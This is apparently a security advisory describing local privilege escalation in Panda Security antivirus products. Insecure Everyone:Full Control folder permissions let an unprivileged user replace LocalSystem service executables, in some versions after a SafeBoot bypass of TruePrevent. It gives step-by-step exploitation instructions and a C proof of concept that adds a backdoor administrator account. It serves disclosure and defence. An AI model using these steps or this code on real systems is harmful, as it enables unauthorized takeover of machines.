Panda Security Local Privilege Escalation

Description: ============ 1. 32Bit Version of Panda Security for Desktops/File Servers +----------------------------------------------------------- During installation of Panda Security for Desktops/File Servers the permissions for installation folder %ProgramFiles%\Panda Software\AVTC\ by default are set to Everyone:Full Control. Few services (e.g. PAVSRV51.EXE) are started from this folder. Services are started under LocalSystem account. The 32bit Version of Panda Security for Desktops/File Servers installs the TruePrevent package by default, which protects the files in the installation directory from manipulation. If the TruePrevent Service (Panda TPSrv) is not running the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which the TPSrv is not started and all services files can be manipulated. This can be exploited by: a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder c. Copy any application to PAVSRV51.exe d. Reboot Upon reboot trojaned application will be executed with LocalSystem account. Executable started as services: +------------------------------ %ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only) %ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe 2. 64Bit Version of Panda Security for Desktops/File Servers +----------------------------------------------------------- During installation of Panda Security for Desktops/File Servers the permissions for installation folder %ProgramFiles%\Panda Software\AVTC\ by default are set to Everyone:Full Control. Few services (e.g. PavSrvx86.EXE) are started from this folder. Services are started under LocalSystem account. In the 64bit Version of Panda Security for Desktops/File Servers is no TruePrevent package available, which protects the files in the installation directory from manipulation. There is no protection of service files. It's possible for unprivileged user to replace service executable with the file of his choice to get full access with LocalSystem privileges. This can be exploited by: a. Rename PavSrvX86.exe to PavSrvX86.old in Panda folder b. Copy any application to PavSrvX86.exe c. Reboot Upon reboot trojaned application will be executed with LocalSystem account. Executable started as services: +------------------------------ C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PavSrvX86.exe C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsImSvc.exe C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PskSvc.exe C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsCtrlS.exe 3. Panda Internet Security/Global Protection/Antivirus Pro 20XX +----------------------------------------------------------------------- During installation of the Panda Security 20XX Products the permissions for installation folder %ProgramFiles%\panda security\panda <product>\ by default are set to Everyone:Full Control. Few services (e.g. PAVSRV51.EXE) are started from this folder. Services are started under LocalSystem account. This products installs the TruePrevent package by default, which protects the files in the installation directory from manipulation. If the TruePrevent Service (Panda TPSrv) is not running the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which the TPSrv is not started and all services files can be manipulated. This can be exploited by: a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder c. Copy any application to PAVSRV51.exe d. Reboot Upon reboot trojaned application will be executed with LocalSystem account. Executable started as services: +------------------------------ %ProgramFiles%\panda security\panda <product>\firewall\PSHOST.EXE %ProgramFiles%\Panda Security\Panda <product>\PavFnSvr.exe %ProgramFiles%\Panda Security\Panda <product>\PsImSvc.exe %ProgramFiles%\Panda Security\Panda <product>\pavsrv51.exe %ProgramFiles%\Panda Security\Panda <product>\PskSvc.exe %ProgramFiles%\Panda Security\Panda <product>\PsCtrls.exe %ProgramFiles%\Panda Security\Panda <product>\TPSrv.exe 4. Panda Antivirus for Netbooks +------------------------------ During installation of the Panda Antivirus for Netbooks the permissions for installation folder %ProgramFiles%\panda security\Panda Antivirus for Netbooks\ by default are set to Everyone:Full Control. Few services (e.g. PAVSRV51.EXE) are started from this folder. Services are started under LocalSystem account. This product installs the TruePrevent package by default, which protects the files in the installation directory from manipulation. If the TruePrevent Service (Panda TPSrv) is not running the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which the TPSrv is not started and all services files can be manipulated. This can be exploited by: a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder c. Copy any application to PAVSRV51.exe d. Reboot Upon reboot trojaned application will be executed with LocalSystem account. This product was not patched like the other 2010 products, so the the following vulnerability already exists: http://www.securityfocus.com/bid/36897 TruePrevent bypass: It can be bypassed using "Open" dialog in "Quarantine" -> Add file" functionality. Executable started as services: +------------------------------ %ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PavFnSvr.exe %ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsImSvc.exe %ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\pavsrv51.exe %ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PskSvc.exe %ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsCtrls.exe %ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\TPSrv.exe Proof of Concept : ================== #include <windows.h> #include <stdio.h> INT main( VOID ) { CHAR szWinDir[ _MAX_PATH ]; CHAR szCmdLine[ _MAX_PATH ]; GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH ); printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" ); wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir ); system( szCmdLine ); printf( "Adding user \"owner\" to the local Administrators group...\n" ); wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir ); system( szCmdLine ); return 0; }